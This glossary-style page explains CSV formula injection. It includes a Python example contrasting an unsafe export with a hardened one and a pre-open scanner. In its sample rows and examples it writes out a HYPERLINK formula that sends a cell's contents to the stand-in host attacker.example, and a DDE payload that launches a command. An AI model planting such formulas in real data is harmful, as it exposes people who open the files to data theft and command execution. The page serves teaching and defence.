CSV Injection
What is CSV Injection?
CSV Injection: An attack that embeds spreadsheet formulas into exported CSV files so that opening the file in Excel or Sheets executes attacker-controlled actions.
CSV injection, sometimes called formula injection, abuses spreadsheet applications that evaluate any cell beginning with =, +, -, or @ (some importers also strip a leading tab or carriage return and then evaluate what follows). When a web application stores attacker-supplied input and later exports it to CSV, the file a victim opens can trigger DDE, call out to remote URLs, leak the contents of other cells, or act as a dropper, depending on the spreadsheet application and the security prompts the user accepts. The flaw sits in the consumer of the export rather than in the database or the CSV format itself, so it is easily missed during code review, and wrapping every field in double quotes does not help on its own: Excel strips the quotes and still sees the leading =. Defences are to prefix any cell that begins with one of these characters with a single quote (or another safe prefix), to emit genuinely numeric fields as numbers rather than strings so that negative values are not mangled, to escape embedded quotes and delimiters so a value cannot break out of its cell, and to warn users before they open spreadsheets built from untrusted data.
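The export path and the pre-open check described above, as an added Python example that is not part of the original page. It assumes a hypothetical web application that exports user records with the standard library csv module; the sample rows, the helper names (neutralise_cell, export_csv, scan_csv) and the column layout are constructed for illustration and carry the two payloads discussed on this page.

```python
import csv
import io

# Leading characters that Excel, LibreOffice Calc and Google Sheets treat as the
# start of a formula. Tab and carriage return are included because some importers
# strip them and then evaluate what follows (OWASP CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Constructed sample data: the id column is numeric, the name column is
# user-controlled and carries the payloads from this page plus a text value
# that merely looks like a number.
HEADERS = ["id", "name", "email"]
SAMPLE_ROWS = [
    [1, "Alice Example", "alice@example.com"],
    [2, '=HYPERLINK("https://attacker.example/?l="&A2,"Click")', "bob@example.com"],
    [3, "=cmd|'/c calc'!A1", "eve@example.com"],
    [4, "-5", "neg@example.com"],  # arrives as text, so it must be neutralised too
]


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would try to evaluate this cell."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralise_cell(value):
    """Prefix formula-like text with a single quote so it is stored as a string.

    Numbers are left untouched: a negative int such as -5 is not a formula, and
    only str values can carry attacker-controlled leading characters. Columns
    known to be numeric should therefore be passed as numbers, not strings.
    """
    if isinstance(value, str) and is_formula_like(value):
        return "'" + value
    return value


def export_csv_unsafe(rows, headers):
    """The vulnerable pattern: user data written straight into the export."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(headers)
    writer.writerows(rows)
    return buf.getvalue()


def export_csv(rows, headers):
    """Hardened export: every cell is neutralised, then quoted.

    csv.writer doubles embedded double quotes, so a value such as foo","=1+1
    cannot break out of its cell. QUOTE_ALL alone would not stop evaluation,
    because Excel strips the quotes and still sees the leading '='; the
    apostrophe added by neutralise_cell is what makes the cell inert.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(headers)
    for row in rows:
        writer.writerow([neutralise_cell(cell) for cell in row])
    return buf.getvalue()


def scan_csv(text):
    """Pre-open check for an untrusted CSV: list (row, column, value) of cells
    a spreadsheet would evaluate. Row 0 is the header line."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


if __name__ == "__main__":
    print("unsafe export flags:", scan_csv(export_csv_unsafe(SAMPLE_ROWS, HEADERS)))
    print("hardened export flags:", scan_csv(export_csv(SAMPLE_ROWS, HEADERS)))
    print(export_csv(SAMPLE_ROWS, HEADERS))
```

The unsafe export is flagged three times (both payloads and the text value "-5"), the hardened export not at all. Note the trade-off the "-5" row exposes: the apostrophe is visible in LibreOffice and some other consumers, so the fix for fields that are really numbers is to export them typed as numbers, which neutralise_cell leaves alone, rather than to strip the prefix.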
● Examples
- 01
A contact form whose name field accepts =HYPERLINK("https://attacker.example/?l="&A2,"Click"); when the export is opened and a user clicks the link, the contents of cell A2 are sent to the attacker's server as a query parameter.
- 02
An exported CRM report containing =cmd|'/c calc'!A1, which launches a command through DDE in older Excel versions once the user accepts the security prompts.
● Frequently asked questions
What is CSV Injection?
An attack that embeds spreadsheet formulas into exported CSV files so that opening the file in Excel or Sheets executes attacker-controlled actions. It belongs to the Attacks & Threats category of cybersecurity.
What does CSV Injection mean?
An attack that embeds spreadsheet formulas into exported CSV files so that opening the file in Excel or Sheets executes attacker-controlled actions.
How do you defend against CSV Injection?
Neutralise cells that begin with =, +, -, @, tab or carriage return before export (typically by prefixing a single quote), emit numeric fields as numbers rather than strings, escape embedded quotes and delimiters so a value cannot break out of its cell, keep spreadsheet clients on settings that block DDE and external content, and warn users before they open exports built from untrusted data.
What are other names for CSV Injection?
Common alternative names include: Formula injection and CSV formula injection. The term Excel macro injection is also used loosely, although the attack relies on formulas and DDE rather than VBA macros.